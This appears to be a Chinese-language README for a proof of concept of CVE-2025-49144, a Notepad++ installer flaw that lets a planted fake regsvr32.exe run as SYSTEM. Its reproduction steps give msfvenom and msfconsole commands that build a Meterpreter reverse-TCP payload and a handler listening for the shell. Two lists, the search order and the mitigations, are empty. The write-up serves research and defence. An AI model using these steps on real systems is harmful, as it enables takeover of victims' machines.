
📌 CVE-2025-49144 是一个高危本地权限提升漏洞,存在于 Notepad++ v8.8.1 及之前版本的安装程序中。该漏洞源于安装过程中不受控制的可执行文件搜索路径行为,允许本地攻击者通过在安装程序所在目录放置恶意可执行文件来获取 SYSTEM 级权限。
⚙️ 漏洞原理 – 逐步解析:
🧱 1. 安装程序哪里出了问题?
Notepad++ 安装程序(v8.8.2 之前)调用 regsvr32.exe 注册某些组件,但未提供完整路径(如 C:\Windows\System32\regsvr32.exe)。
相反,它只运行:
regsvr32.exe some_dll
📂 2. Windows 搜索路径行为: 当可执行文件未指定完整路径时,Windows 使用特定搜索顺序查找文件:
因此,如果假的 regsvr32.exe 被放在安装程序同一文件夹(如 Downloads)中,Windows 会优先使用它而不是真正的 regsvr32.exe。
💣 3. 利用方法:
- 攻击者在合法 Notepad++ 安装程序所在文件夹(例如受害者 Downloads 文件夹)放置一个恶意的 regsvr32.exe。
- 受害者运行安装程序(以为安全)。
- 安装程序调用 regsvr32.exe,但实际执行的是同一文件夹中的恶意版本——且具有 SYSTEM 权限(因为安装程序通常请求管理员权限)。
- 攻击者的载荷现在以 NT AUTHORITY\SYSTEM 权限运行。
⚙️ 复现步骤:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
注意:这是一个 PoC,已在关闭 Windows Defender 和实时保护的情况下测试通过。
✅ 缓解措施
用户和管理员应:
安全团队应定期审计安装路径、监控写入权限,并观察安装程序执行期间的行为,以减少攻击面。
MIT 许可证 — 仅限教育、研究和防御用途。
欢迎提交 Pull Request — 改进检测、添加功能或提供修复建议。
本 PoC 仅用于教育和研究目的。使用风险自负。作者不对任何滥用或损害负责。